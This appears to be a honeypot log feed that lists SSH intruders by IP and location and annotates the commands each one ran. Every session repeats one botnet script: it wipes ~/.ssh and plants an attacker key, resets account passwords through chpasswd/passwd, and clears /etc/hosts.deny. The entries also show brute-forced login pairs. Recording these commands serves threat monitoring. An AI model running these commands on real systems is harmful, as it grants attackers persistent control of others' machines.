$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:KFFcr8wpuZAB"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 silk_root_18 (111.47.243.219) β€” Guangzhou, China Β· 1 session Β· 19 cmds
2026-05-22 23:49 EDT Β· as root/Fu123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:38xHxMpeAj9a"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_72 (124.156.129.246) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 39 cmds
2026-05-11 17:39 EDT Β· as root/Root!@#456, user1/12345678
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:O1oh1SE0c54T"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "12345678\n0S3xkOmHyf4Y\n0S3xkOmHyf4Y"|passwd|bash
$ Enter new UNIX password:
$ echo "12345678\n0S3xkOmHyf4Y\n0S3xkOmHyf4Y\n"|passwd
🎭 frost_root_10 (87.226.190.225) β€” St Petersburg, Russia Β· 1 session Β· 20 cmds
2026-05-22 23:28 EDT Β· as ripple/ripple
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "ripple\nj7qUlXSE8i6i\nj7qUlXSE8i6i"|passwd|bash
$ Enter new UNIX password:
$ echo "ripple\nj7qUlXSE8i6i\nj7qUlXSE8i6i\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_66 (165.154.23.26) β€” Hong Kong, Hong Kong Β· 1 session Β· 19 cmds
2026-05-22 23:27 EDT Β· as root/Root!@#456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:vGPY1TuwiDKo"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 strudel_root_9 (185.237.15.230) β€” Frankfurt, Germany Β· 1 session Β· 20 cmds
2026-05-22 22:45 EDT Β· as user01/P@ssw0rd
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "P@ssw0rd\nWPtWgnO3FDAB\nWPtWgnO3FDAB"|passwd|bash
$ Enter new UNIX password:
$ echo "P@ssw0rd\nWPtWgnO3FDAB\nWPtWgnO3FDAB\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 toucan_root_7 (170.80.65.140) β€” Vespasiano, Brazil Β· 3 sessions Β· 59 cmds
2026-05-22 22:13 EDT Β· as andong/andong123, ehsan/123, root/1qaz@WSX!QAZ
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:U28htDhL3f5I"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "andong123\n51o2juVtpkeA\n51o2juVtpkeA"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "andong123\n51o2juVtpkeA\n51o2juVtpkeA\n"|passwd
$ echo -e "123\nRz7404FIqutT\nRz7404FIqutT"|passwd|bash
$ echo "123\nRz7404FIqutT\nRz7404FIqutT\n"|passwd
🎭 cowboy_root_37 (38.60.91.176) β€” Los Angeles, United States Β· 2 sessions Β· 39 cmds
2026-05-22 22:13 EDT Β· as andong/andong123, root/1qaz@WSX!QAZ
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "andong123\nenxG6X9ON5Vr\nenxG6X9ON5Vr"|passwd|bash
$ Enter new UNIX password:
$ echo "andong123\nenxG6X9ON5Vr\nenxG6X9ON5Vr\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:unWymfSo7NYa"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 tulip_root_9 (89.124.66.7) β€” Amsterdam, Netherlands Β· 1 session Β· 20 cmds
2026-05-22 21:47 EDT Β· as localhost/Jay56
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Jay56\nl8gG7R9vy4NW\nl8gG7R9vy4NW"|passwd|bash
$ Enter new UNIX password:
$ echo "Jay56\nl8gG7R9vy4NW\nl8gG7R9vy4NW\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_23 (101.126.26.93) β€” Chaowai, China Β· 1 session Β· 17 cmds
2026-05-22 21:45 EDT Β· as root/Huawei12#$
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:3Imb1giFtMeo"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
🎭 phantom_6 (152.32.209.166) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-05-22 21:37 EDT Β· as x/password123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "password123\nqD0ZR7dHVytc\nqD0ZR7dHVytc"|passwd|bash
$ Enter new UNIX password:
$ echo "password123\nqD0ZR7dHVytc\nqD0ZR7dHVytc\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_80 (190.85.41.170) β€” BogotΓ‘, Colombia Β· 4 sessions Β· 26 cmds
2026-05-15 02:10 EDT Β· as clawd/clawd123, dbus-helper/warnight, root/c31ea01ca12b5558b6503a8143cdb98c
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "clawd123\nboBqt5NUnHCg\nboBqt5NUnHCg"|passwd|bash
$ Enter new UNIX password:
$ echo "clawd123\nboBqt5NUnHCg\nboBqt5NUnHCg\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_85 (216.155.93.75) β€” Dalcahue, Chile Β· 1 session Β· 20 cmds
2026-05-22 21:22 EDT Β· as clawd/clawd123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "clawd123\npbR64c0bK0Bc\npbR64c0bK0Bc"|passwd|bash
$ Enter new UNIX password:
$ echo "clawd123\npbR64c0bK0Bc\npbR64c0bK0Bc\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_81 (165.154.205.91) β€” Singapore, Singapore Β· 2 sessions Β· 38 cmds
2026-05-22 20:03 EDT Β· as root/666666, root/Aa135246
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:kcuV8COkTnII"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:Pta7vC4sVLIV"|chpasswd|bash
🎭 phantom_root_73 (103.69.96.120) β€” BΓΊt SΖ‘n, Vietnam Β· 1 session Β· 20 cmds
